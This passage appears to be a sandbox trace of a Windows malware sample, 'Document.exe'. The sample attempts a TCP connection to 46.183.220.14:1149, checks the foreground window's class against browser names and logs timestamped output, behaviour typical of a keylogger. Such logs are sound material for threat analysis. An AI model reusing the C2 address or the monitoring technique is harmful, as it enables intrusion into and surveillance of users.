(lpMsg=0x30fb80) returned 0x0 [0226.186] SendMessageA (hWnd=0x1018e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x14 [0226.186] GetLastError () returned 0x0 [0226.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30f8a0, cbMultiByte=1, lpWideCharStr=0x6d2614, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0226.187] SysStringLen (param_1="") returned 0x14 [0226.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0226.187] SendMessageA (hWnd=0x1018e, Msg=0xd, wParam=0x15, lParam=0x6d2614) returned 0x14 [0226.187] GetLastError () returned 0x0 [0226.187] SysStringByteLen (bstr="牁敧瑮湩⁡潓楶瑥䄠杶") returned 0x14 [0226.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d2614, cbMultiByte=20, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0226.188] VarBstrCmp (bstrLeft="Argentina Soviet Avg", bstrRight="Argentina Soviet Avg", lcid=0x0, dwFlags=0x30001) returned 0x1 [0226.188] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 0 [0226.188] GetTickCount () returned 0x3da18 [0226.188] GetTickCount () returned 0x3da18 [0226.188] GetTickCount () returned 0x3da18 [0226.188] PeekMessageA (in: lpMsg=0x30fae4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fae4) returned 0 [0226.188] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x30fb80) returned 0 [0226.188] WaitMessage () returned 1 [0226.357] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0226.357] TranslateMessage (lpMsg=0x30fb80) returned 0 [0226.357] DispatchMessageA (lpMsg=0x30fb80) returned 0x0 [0226.357] GetCurrentProcessId () returned 0x35c [0226.357] PeekMessageA (in: lpMsg=0x30f8c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30f8c8) returned 0 [0226.357] GetTickCount () returned 0x3dac4 [0226.357] GetTickCount () returned 0x3dac4 [0226.357] GetTickCount () returned 0x3dac4 [0226.357] GetTickCount () returned 0x3dac4 [0226.357] IsWindowVisible (hWnd=0x20286) returned 0 [0226.357] Sleep (dwMilliseconds=0x0) [0226.358] Sleep (dwMilliseconds=0x1) [0226.373] GetLastError () returned 0x0 [0226.373] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0226.373] IMalloc:Alloc (This=0x75e366bc, cb=0x4b) returned 0x6e53d0 [0226.373] DispCallFunc (pvInstance=0x6cfda0, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x1, prgvt=0x6e5418, prgpvarg=0x6e5410, pvargResult=0x30f810) returned 0x0 [0226.373] GetUserDefaultLCID () returned 0x409 [0226.373] VarI4FromStr (in: strIn="1149", lcid=0x409, dwFlags=0x0, plOut=0x30edd0 | out: plOut=0x30edd0) returned 0x0 [0226.374] htons (hostshort=0x47d) returned 0x7d04 [0226.374] GetLastError () returned 0x0 [0226.374] SysStringLen (param_1="46.183.220.14") returned 0xd [0226.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="46.183.220.14", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0226.374] inet_addr (cp="46.183.220.14") returned 0xedcb72e [0226.374] GetLastError () returned 0x0 [0226.374] SysStringByteLen (bstr="㘴ㄮ㌸㈮〲ㄮ4") returned 0xd [0226.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6e0ecc, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0226.374] ITypeInfo:LocalInvoke (This=0x6e4d94) returned 0x0 [0226.374] socket (af=2, type=1, protocol=6) returned 0x190 [0226.375] GetLastError () returned 0x0 [0226.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=8, lpMultiByteStr=0x30ed14, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 8 [0226.375] connect (s=0x190, name=0x30ed0c*(sa_family=2, sin_port=0x47d, sin_addr="46.183.220.14"), namelen=16) returned -1 [0227.581] GetLastError () returned 0x274d [0227.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30ed14, cbMultiByte=8, lpWideCharStr=0x30ed2c, cchWideChar=8 | out: lpWideCharStr="") returned 8 [0227.581] closesocket (s=0x190) returned 0 [0227.581] GetLastError () returned 0x0 [0227.581] IMalloc:Free (This=0x75e366bc, pv=0x6e53d0) [0227.581] PeekMessageA (in: lpMsg=0x30fb80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fb80) returned 1 [0227.868] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x3b, wParam=0x50e, lParam=0x0) returned 0x1 [0227.868] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x11, wParam=0x0, lParam=0x0) returned 0x1 [0227.868] GetLastError () returned 0x0 [0227.868] CallWindowProcA (lpPrevWndFunc=0x77e9abc8, hWnd=0x202e0, Msg=0x11, wParam=0x0, lParam=0x0) returned 0x1 [0227.868] GetLastError () returned 0x0 [0227.869] NtdllDefWindowProc_A (hWnd=0x802c4, Msg=0x11, wParam=0x0, lParam=0x0) returned 0x1 [0227.869] NtdllDefWindowProc_A (hWnd=0x20286, Msg=0x11, wParam=0x0, lParam=0x0) returned 0x1 [0227.869] NtdllDefWindowProc_A (hWnd=0x702de, Msg=0x11, wParam=0x0, lParam=0x0) returned 0x1 [0227.869] GetLastError () returned 0x0 [0227.875] IsWindow (hWnd=0x50276) returned 1 [0227.875] GetWindowLongA (hWnd=0x50276, nIndex=-16) returned 79691972 [0227.875] GetParent (hWnd=0x50276) returned 0x0 [0227.875] TranslateMessage (lpMsg=0x30fb80) returned 0 [0227.875] DispatchMessageA (lpMsg=0x30fb80) [0227.875] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f9b8 | out: ppsaOut=0x30f9b8) returned 0x0 [0227.876] GetUserDefaultLCID () returned 0x409 [0227.876] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6dc, cchData=6 | out: lpLCData="1252") returned 5 [0227.876] SysStringLen (param_1="user32.dll") returned 0xb [0227.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="user32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0227.876] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6ec | out: ppsaOut=0x30f6ec) returned 0x0 [0227.876] GetUserDefaultLCID () returned 0x409 [0227.876] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6dc, cchData=6 | out: lpLCData="1252") returned 5 [0227.876] SysStringLen (param_1="KillTimer") returned 0xa [0227.876] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="KillTimer", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0227.876] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6ec | out: ppsaOut=0x30f6ec) returned 0x0 [0227.877] SetErrorMode (uMode=0x8001) returned 0x8001 [0227.877] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0227.877] SetErrorMode (uMode=0x8001) returned 0x8001 [0227.877] GetProcAddress (hModule=0x77820000, lpProcName="KillTimer") returned 0x778379db [0227.877] SafeArrayDestroyDescriptor (psa=0x6d7238) returned 0x0 [0227.877] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0227.877] KillTimer (hWnd=0x50276, uIDEvent=0x0) returned 1 [0227.877] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0227.877] SendMessageA (hWnd=0x50276, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0227.877] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0227.877] GetLastError () returned 0x0 [0227.877] GetLastError () returned 0x0 [0227.877] SendMessageA (hWnd=0x50276, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0227.877] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0227.877] GetLastError () returned 0x0 [0227.877] GetLastError () returned 0x0 [0227.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30f830, cbMultiByte=1, lpWideCharStr=0x6d2614, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0227.878] SysStringLen (param_1="") returned 0x3 [0227.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0227.878] SendMessageA (hWnd=0x50276, Msg=0xd, wParam=0x4, lParam=0x6d2614) returned 0x3 [0227.878] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xd, wParam=0x4, lParam=0x6d2614) returned 0x3 [0227.878] GetLastError () returned 0x0 [0227.878] GetLastError () returned 0x0 [0227.878] SysStringByteLen (bstr="ഠ\n") returned 0x3 [0227.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6d2614, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0227.878] SendMessageA (hWnd=0x50276, Msg=0xc, wParam=0x0, lParam=0x0) returned 0x1 [0227.878] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0xc, wParam=0x0, lParam=0x0) returned 0x1 [0227.878] GetLastError () returned 0x578 [0227.878] GetLastError () returned 0x578 [0227.878] GetLocalTime (in: lpSystemTime=0x30f6fc | out: lpSystemTime=0x30f6fc*(wYear=0x7e2, wMonth=0xb, wDayOfWeek=0x1, wDay=0x5, wHour=0x9, wMinute=0x1e, wSecond=0x25, wMilliseconds=0xfd)) [0227.878] VarDateFromUdate (in: pudateIn=0x30f720, dwFlags=0x0, pdateOut=0x30f6fc | out: pdateOut=0x30f6fc) returned 0x0 [0227.879] VarFormat (in: pvarIn=0x30f780, pstrFormat="mm/dd/yy", iFirstDay=1, iFirstWeek=1, dwFlags=0x0, pbstrOut=0x30f744 | out: pbstrOut=0x30f744*="11/05/18") returned 0x0 [0227.879] GetLocalTime (in: lpSystemTime=0x30f6fc | out: lpSystemTime=0x30f6fc*(wYear=0x7e2, wMonth=0xb, wDayOfWeek=0x1, wDay=0x5, wHour=0x9, wMinute=0x1e, wSecond=0x25, wMilliseconds=0xfd)) [0227.879] VarDateFromUdate (in: pudateIn=0x30f720, dwFlags=0x0, pdateOut=0x30f6fc | out: pdateOut=0x30f6fc) returned 0x0 [0227.879] VarFormat (in: pvarIn=0x30f780, pstrFormat="hh:mm:ss", iFirstDay=1, iFirstWeek=1, dwFlags=0x0, pbstrOut=0x30f740 | out: pbstrOut=0x30f740*="09:30:37") returned 0x0 [0227.879] VarBstrCmp (bstrLeft="11/05/18", bstrRight="11/05/18", lcid=0x0, dwFlags=0x30001) returned 0x1 [0227.879] GetUserDefaultLCID () returned 0x409 [0227.879] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6d0, cchData=6 | out: lpLCData="1252") returned 5 [0227.879] SysStringLen (param_1="GetForegroundWindow") returned 0x13 [0227.879] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetForegroundWindow", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0227.879] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6e0 | out: ppsaOut=0x30f6e0) returned 0x0 [0227.880] GetUserDefaultLCID () returned 0x409 [0227.880] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6d0, cchData=6 | out: lpLCData="1252") returned 5 [0227.880] SysStringLen (param_1=" \r\n") returned 0x3 [0227.880] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \r\n", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0227.880] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f6e0 | out: ppsaOut=0x30f6e0) returned 0x0 [0227.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x409ed0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0227.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x409ed0, cbMultiByte=-1, lpWideCharStr=0x6e0f1c, cchWideChar=7 | out: lpWideCharStr="Source") returned 7 [0227.880] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x30f6c8) [0227.880] RtlUnwind (TargetFrame=0x30f7ec, TargetIp=0x72a43bb5, ExceptionRecord=0x0, ReturnValue=0x0) [0227.880] GetUserDefaultLCID () returned 0x409 [0227.880] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f6d0, cchData=6 | out: lpLCData="1252") returned 5 [0227.880] SysStringByteLen (bstr="뗂¾") returned 0x3 [0227.880] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x6e0ecc, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0227.880] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0227.880] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0227.881] ITextStream:Write (This=0x3d458, Text="\xc2\xb5\xbe\x0d\x0a") returned 0x0 [0227.881] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30f848 | out: ppsaOut=0x30f848) returned 0x0 [0227.881] GetUserDefaultLCID () returned 0x409 [0227.881] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f604, cchData=6 | out: lpLCData="1252") returned 5 [0227.881] SysStringLen (param_1="user32.dll") returned 0xb [0227.881] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="user32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0227.881] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f614 | out: ppsaOut=0x30f614) returned 0x0 [0227.881] GetUserDefaultLCID () returned 0x409 [0227.882] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30f604, cchData=6 | out: lpLCData="1252") returned 5 [0227.882] SysStringLen (param_1="GetClassNameW") returned 0xe [0227.882] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetClassNameW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0227.882] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30f614 | out: ppsaOut=0x30f614) returned 0x0 [0227.882] SetErrorMode (uMode=0x8001) returned 0x8001 [0227.882] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0227.882] SetErrorMode (uMode=0x8001) returned 0x8001 [0227.882] GetProcAddress (hModule=0x77820000, lpProcName="GetClassNameW") returned 0x778382a9 [0227.882] SafeArrayDestroyDescriptor (psa=0x6d7238) returned 0x0 [0227.882] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0227.882] GetClassNameW (in: hWnd=0x202ec, lpClassName=0x6d8adc, nMaxCount=256 | out: lpClassName="XLMAIN") returned 6 [0227.882] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0227.882] VarBstrCmp (bstrLeft="XLMAIN", bstrRight="MozillaUIWindowClass", lcid=0x0, dwFlags=0x30001) returned 0x2 [0227.883] VarBstrCmp (bstrLeft="XLMAIN", bstrRight="MozillaWindowClass", lcid=0x0, dwFlags=0x30001) returned 0x2 [0227.883] VarBstrCmp (bstrLeft="XLMAIN", bstrRight="IEFrame", lcid=0x0, dwFlags=0x30001) returned 0x2 [0227.883] VarBstrCmp (bstrLeft="XLMAIN", bstrRight="OpWindow", lcid=0x0, dwFlags=0x30001) returned 0x2 [0227.883] VarBstrCmp (bstrLeft="XLMAIN", bstrRight="OperaWindowClass", lcid=0x0, dwFlags=0x30001) returned 0x2 [0227.883] VarBstrCmp (bstrLeft="XLMAIN", bstrRight="Chrome_WidgetWin_1", lcid=0x0, dwFlags=0x30001) returned 0x2 [0227.883] VarBstrCmp (bstrLeft="XLMAIN", bstrRight="CabinetWClass", lcid=0x0, dwFlags=0x30001) returned 0x2 [0227.883] SendMessageA (hWnd=0x202ec, Msg=0xe, wParam=0x0, lParam=0x0) [0227.883] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x3b, wParam=0x50c, lParam=0x0) [0227.883] CallWindowProcA (lpPrevWndFunc=0xffff026f, hWnd=0x50276, Msg=0x16, wParam=0x1, lParam=0x0) returned 0x0 [0227.883] GetLastError () returned 0x0 [0227.883] CallWindowProcA (lpPrevWndFunc=0x77e9abc8, hWnd=0x202e0, Msg=0x16, wParam=0x1, lParam=0x0) returned 0x0 [0227.883] GetLastError () returned 0x0 [0227.883] NtdllDefWindowProc_A (hWnd=0x802c4, Msg=0x16, wParam=0x1, lParam=0x0) returned 0x0 [0227.883] NtdllDefWindowProc_A (hWnd=0x20286, Msg=0x16, wParam=0x1, lParam=0x0) returned 0x0 [0227.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x409ed0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0227.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x409ed0, cbMultiByte=-1, lpWideCharStr=0x6e0f1c, cchWideChar=7 | out: lpWideCharStr="Source") returned 7 [0227.883] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x30ee88) [0227.883] RtlUnwind (TargetFrame=0x30ef2c, TargetIp=0x72a43bb5, ExceptionRecord=0x0, ReturnValue=0x0) [0227.883] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30ee28 | out: ppsaOut=0x30ee28) returned 0x0 [0227.884] GetUserDefaultLCID () returned 0x409 [0227.884] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30ebd0, cchData=6 | out: lpLCData="1252") returned 5 [0227.884] SysStringLen (param_1="user32.dll") returned 0xb [0227.884] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="user32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0227.884] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30ebe0 | out: ppsaOut=0x30ebe0) returned 0x0 [0227.884] GetUserDefaultLCID () returned 0x409 [0227.884] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30ebd0, cchData=6 | out: lpLCData="1252") returned 5 [0227.884] SysStringLen (param_1="SetWindowLongA") returned 0xf [0227.884] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetWindowLongA", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0227.884] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30ebe0 | out: ppsaOut=0x30ebe0) returned 0x0 [0227.885] SetErrorMode (uMode=0x8001) returned 0x8001 [0227.885] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0227.885] SetErrorMode (uMode=0x8001) returned 0x8001 [0227.885] GetProcAddress (hModule=0x77820000, lpProcName="SetWindowLongA") returned 0x77846110 [0227.885] SafeArrayDestroyDescriptor (psa=0x6d7238) returned 0x0 [0227.885] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0227.885] SetWindowLongA (hWnd=0x50276, nIndex=-4, dwNewLong=-64913) returned 4211776 [0227.885] SafeArrayDestroyDescriptor (psa=0x6d71d8) returned 0x0 [0227.885] SendMessageA (hWnd=0x50276, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0227.885] GetLastError () returned 0x0 [0227.885] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x30ee28 | out: ppsaOut=0x30ee28) returned 0x0 [0227.887] GetUserDefaultLCID () returned 0x409 [0227.887] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30ebd0, cchData=6 | out: lpLCData="1252") returned 5 [0227.887] SysStringLen (param_1="user32.dll") returned 0xb [0227.887] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="user32.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0227.887] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30ebe0 | out: ppsaOut=0x30ebe0) returned 0x0 [0227.887] GetUserDefaultLCID () returned 0x409 [0227.887] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x30ebd0, cchData=6 | out: lpLCData="1252") returned 5 [0227.887] SysStringLen (param_1="DestroyWindow") returned 0xe [0227.887] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DestroyWindow", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0227.888] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x30ebe0 | out: ppsaOut=0x30ebe0) returned 0x0 [0227.888] SetErrorMode (uMode=0x8001) returned 0x8001 [0227.888] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77820000 [0227.888] SetErrorMode (uMode=0x8001) returned 0x8001 [0227.888] GetProcAddress (hModule=0x77820000, lpProcName="DestroyWindow") returned 0x77839a55 [0227.888] SafeArrayDestroyDescriptor (psa=0x6d7238) returned 0x0 [0227.888] SafeArrayDestroyDescriptor (psa=0x6d7208) returned 0x0 [0227.888] DestroyWindow (hWnd=0x50276) Thread: id = 79 os_tid = 0x7e0 Thread: id = 80 os_tid = 0x144 [0202.680] GetCurrentThreadId () returned 0x144 Process: id = "12" image_name = "document.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe" page_root = "0x3b8d5000" os_pid = "0xb6c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xa68" cmd_line = "\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1918 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1919 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1920 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1921 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1922 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1923 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1924 start_va = 0x400000 end_va = 0x4b2fff entry_point = 0x400000 region_type = mapped_file name = "document.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe") Region: id = 1925 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1926 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1927 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1928 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1929 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1930 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1931 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1932 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1933 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1934 start_va = 0x290000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1935 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1936 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1937 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1938 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1939 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 